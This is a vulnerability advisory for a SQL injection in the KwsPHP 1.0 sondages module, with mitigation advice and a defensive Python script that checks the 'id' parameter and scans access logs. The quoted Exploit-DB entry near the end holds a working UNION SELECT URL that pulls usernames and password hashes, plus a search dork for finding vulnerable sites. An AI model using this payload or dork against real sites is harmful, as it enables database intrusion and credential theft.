Vendor: KwsPHP
By: H-T Team (HouSSamix _ ToXiC350)
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: KwsPHP
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
2007

KwsPHP 1.0 sondages Module Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on the KwsPHP 1.0 sondages module. By manipulating the 'id' parameter in the URL, an attacker can retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users can mitigate the risk by validating and sanitizing user input before executing any SQL queries.
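
With no vendor patch available, the input validation described above can be enforced in front of the application and used to review access logs. The following is an added example, not part of the original advisory or of KwsPHP's code: a strict allow-list check for the sondages `id` parameter, applied to access-log request lines. It assumes poll ids are plain integers and that logs use the combined format; the function names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a poll id is a short run of ASCII digits and nothing else.
_POLL_ID = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def is_valid_poll_id(value):
    """Allow-list check for the sondages 'id' parameter (hypothetical helper)."""
    return _POLL_ID.fullmatch(value) is not None


def check_request(target):
    """Return None if the request target is acceptable, else a reason string."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "sondages" not in query.get("mod", []):
        return None  # other modules are out of scope for this check
    ids = query.get("id", [])
    if len(ids) > 1:
        return "duplicate id parameter"  # ambiguous input, reject outright
    if ids and not is_valid_poll_id(ids[0]):
        return "non-numeric id"
    return None


def flag_log_lines(lines):
    """Return (line_number, reason) for each rejected sondages request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _REQUEST.search(line)
        if not match:
            continue
        reason = check_request(match.group(1))
        if reason:
            hits.append((number, reason))
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Sep/2007:10:00:00 +0000] "GET /index.php?mod=sondages&do=results&id=4 HTTP/1.1" 200 512',
    '192.0.2.11 - - [18/Sep/2007:10:00:05 +0000] "GET /index.php?mod=sondages&do=results&id=-1%20union%20select%201,2 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [18/Sep/2007:10:00:09 +0000] "GET /index.php?mod=news&id=abc HTTP/1.1" 200 300',
    '192.0.2.13 - - [18/Sep/2007:10:00:12 +0000] "GET /index.php?mod=sondages&id=3&id=3%27 HTTP/1.1" 200 300',
]
```

The same `check_request` result can drive a reverse-proxy or WAF rule that rejects the request before it reaches the application; a parameterized query in the module itself remains the actual fix.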

Exploit-DB raw data:

#########################################################################
    KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.fr & http://no-hack.net


## Site: http://kws.koogar.org/
## Dork : inurl:index.php?mod=sondages


## EXPLOITS :

http://server.com/Path/index.php?mod=sondages&do=results&id=-1%20union%20select%201,2,3,concat(pseudo,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users%20where%20id=1--



## GREETZ  : All members no-hack

#########################################################################
         KwsPHP 1.0 sondages Module Remote SQL Injection Exploit
######################################################################### 

# milw0rm.com [2007-09-18]